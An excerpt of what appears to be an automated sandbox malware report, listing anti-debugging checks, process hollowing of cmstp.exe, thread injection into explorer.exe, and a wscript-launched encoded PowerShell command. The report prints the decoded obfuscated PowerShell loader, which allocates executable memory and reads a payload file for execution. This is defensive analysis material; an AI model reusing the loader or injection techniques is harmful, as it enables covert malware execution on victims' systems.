Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h] 27_2_047DC600
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h] 27_2_047DC600
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC600 mov eax, dword ptr fs:[00000030h] 27_2_047DC600
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04808E00 mov eax, dword ptr fs:[00000030h] 27_2_04808E00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04891608 mov eax, dword ptr fs:[00000030h] 27_2_04891608
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E76E2 mov eax, dword ptr fs:[00000030h] 27_2_047E76E2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h] 27_2_0480A61C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A61C mov eax, dword ptr fs:[00000030h] 27_2_0480A61C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0488FE3F mov eax, dword ptr fs:[00000030h] 27_2_0488FE3F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h] 27_2_0489AE44
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0489AE44 mov eax, dword ptr fs:[00000030h] 27_2_0489AE44
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857794 mov eax, dword ptr fs:[00000030h] 27_2_04857794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857794 mov eax, dword ptr fs:[00000030h] 27_2_04857794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857794 mov eax, dword ptr fs:[00000030h] 27_2_04857794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EFF60 mov eax, dword ptr fs:[00000030h] 27_2_047EFF60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EEF40 mov eax, dword ptr fs:[00000030h] 27_2_047EEF40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h] 27_2_047D4F2E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D4F2E mov eax, dword ptr fs:[00000030h] 27_2_047D4F2E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FF716 mov eax, dword ptr fs:[00000030h] 27_2_047FF716
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048137F5 mov eax, dword ptr fs:[00000030h] 27_2_048137F5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A070D mov eax, dword ptr fs:[00000030h] 27_2_048A070D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A070D mov eax, dword ptr fs:[00000030h] 27_2_048A070D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h] 27_2_0480A70E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A70E mov eax, dword ptr fs:[00000030h] 27_2_0480A70E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h] 27_2_0486FF10
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486FF10 mov eax, dword ptr fs:[00000030h] 27_2_0486FF10
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480E730 mov eax, dword ptr fs:[00000030h] 27_2_0480E730
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A8F6A mov eax, dword ptr fs:[00000030h] 27_2_048A8F6A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047E8794 mov eax, dword ptr fs:[00000030h] 27_2_047E8794
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04853884 mov eax, dword ptr fs:[00000030h] 27_2_04853884
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04853884 mov eax, dword ptr fs:[00000030h] 27_2_04853884
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048020A0 mov eax, dword ptr fs:[00000030h] 27_2_048020A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048190AF mov eax, dword ptr fs:[00000030h] 27_2_048190AF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h] 27_2_047F0050
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F0050 mov eax, dword ptr fs:[00000030h] 27_2_047F0050
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480F0BF mov ecx, dword ptr fs:[00000030h] 27_2_0480F0BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h] 27_2_0480F0BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480F0BF mov eax, dword ptr fs:[00000030h] 27_2_0480F0BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h] 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h] 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h] 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA830 mov eax, dword ptr fs:[00000030h] 27_2_047FA830
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h] 27_2_047EB02A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h] 27_2_047EB02A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h] 27_2_047EB02A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047EB02A mov eax, dword ptr fs:[00000030h] 27_2_047EB02A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov ecx, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0486B8D0 mov eax, dword ptr fs:[00000030h] 27_2_0486B8D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D58EC mov eax, dword ptr fs:[00000030h] 27_2_047D58EC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857016 mov eax, dword ptr fs:[00000030h] 27_2_04857016
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857016 mov eax, dword ptr fs:[00000030h] 27_2_04857016
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04857016 mov eax, dword ptr fs:[00000030h] 27_2_04857016
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h] 27_2_047D40E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h] 27_2_047D40E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D40E1 mov eax, dword ptr fs:[00000030h] 27_2_047D40E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h] 27_2_048A4015
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A4015 mov eax, dword ptr fs:[00000030h] 27_2_048A4015
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480002D mov eax, dword ptr fs:[00000030h] 27_2_0480002D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04892073 mov eax, dword ptr fs:[00000030h] 27_2_04892073
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9080 mov eax, dword ptr fs:[00000030h] 27_2_047D9080
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048A1074 mov eax, dword ptr fs:[00000030h] 27_2_048A1074
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480A185 mov eax, dword ptr fs:[00000030h] 27_2_0480A185
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h] 27_2_047DB171
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB171 mov eax, dword ptr fs:[00000030h] 27_2_047DB171
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802990 mov eax, dword ptr fs:[00000030h] 27_2_04802990
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DC962 mov eax, dword ptr fs:[00000030h] 27_2_047DC962
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h] 27_2_048061A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048061A0 mov eax, dword ptr fs:[00000030h] 27_2_048061A0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048569A6 mov eax, dword ptr fs:[00000030h] 27_2_048569A6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h] 27_2_048949A4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h] 27_2_048949A4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h] 27_2_048949A4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048949A4 mov eax, dword ptr fs:[00000030h] 27_2_048949A4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h] 27_2_047FB944
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FB944 mov eax, dword ptr fs:[00000030h] 27_2_047FB944
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048551BE mov eax, dword ptr fs:[00000030h] 27_2_048551BE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048551BE mov eax, dword ptr fs:[00000030h] 27_2_048551BE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048551BE mov eax, dword ptr fs:[00000030h] 27_2_048551BE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048551BE mov eax, dword ptr fs:[00000030h] 27_2_048551BE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov eax, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047F4120 mov ecx, dword ptr fs:[00000030h] 27_2_047F4120
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_048641E8 mov eax, dword ptr fs:[00000030h] 27_2_048641E8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h] 27_2_047D9100
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h] 27_2_047D9100
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9100 mov eax, dword ptr fs:[00000030h] 27_2_047D9100
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h] 27_2_047DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h] 27_2_047DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047DB1E1 mov eax, dword ptr fs:[00000030h] 27_2_047DB1E1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480513A mov eax, dword ptr fs:[00000030h] 27_2_0480513A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480513A mov eax, dword ptr fs:[00000030h] 27_2_0480513A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FC182 mov eax, dword ptr fs:[00000030h] 27_2_047FC182
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h] 27_2_0480D294
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480D294 mov eax, dword ptr fs:[00000030h] 27_2_0480D294
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0480FAB0 mov eax, dword ptr fs:[00000030h] 27_2_0480FAB0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h] 27_2_047D9240
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h] 27_2_047D9240
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h] 27_2_047D9240
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047D9240 mov eax, dword ptr fs:[00000030h] 27_2_047D9240
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_04802ACB mov eax, dword ptr fs:[00000030h] 27_2_04802ACB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_047FA229 mov eax, dword ptr fs:[00000030h] 27_2_047FA229
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED496E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1ED496E0

HIPS / PFW / Operating System Protection Evasion:

barindex
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: EB0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class bidrags1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);}"@#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr Test-Path "objekt" Test-Path "FOLKE" $bidrags3=0;$bidrags9=1048576;$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme Test-Path "Baneberrie2" $bidrags2="$env:temp" + "\FORSVARL.dat"#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVI
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Rven PAPAP sawbellyun Ricardt5 OKSBONNETL SCIE chinantas Nons Osamine Battalia2 Hovedp4 professi nanakol ensilerekl Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class bidrags1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int bidrags6,ref Int32 Auxamylase,int Fejem,ref Int32 bidrags,int HOCKEYKAMP,int bidrags7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Semiglut7,uint ATTESTE,int Etiket9,int bidrags0,int bellev,int Buldrr,int FOLKE);[DllImport("kernel32.dll")]public static extern int ReadFile(int Fejem0,uint Fejem1,IntPtr Fejem2,ref Int32 Fejem3,int Fejem4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Fejem5,int Fejem6,int Fejem7,int Fejem8,int Fejem9);}"@#Berigning balust Fjert Splintri7 Melanists VICEUDENRI nettovrd MAGSVEJRCL Mirkosu Cockfighta coppere OPELSK BJRNEUN Hagedesm7 farr Test-Path "objekt" Test-Path "FOLKE" $bidrags3=0;$bidrags9=1048576;$bidrags8=[bidrags1]::NtAllocateVirtualMemory(-1,[ref]$bidrags3,0,[ref]$bidrags9,12288,64)#Socialdem7 SCALD Boggles sikh Oliske Sjuskemal6 investm Elit9 MULTIFACTO Frugal Brnepsy Express Frde CORRODER FRONT fittilyske Epipl Purvey mundsk Stude4 selska komp kbesumsan Autotomicf TRAI lancew Trans Biorytme Test-Path "Baneberrie2" $bidrags2="$env:temp" + "\FORSVARL.dat"#BRATSCHER Prst Formulere3 Nasopharyn Montg CONTRALT NONCAPIL Victorian3 BRNDEVI Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 6392 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbA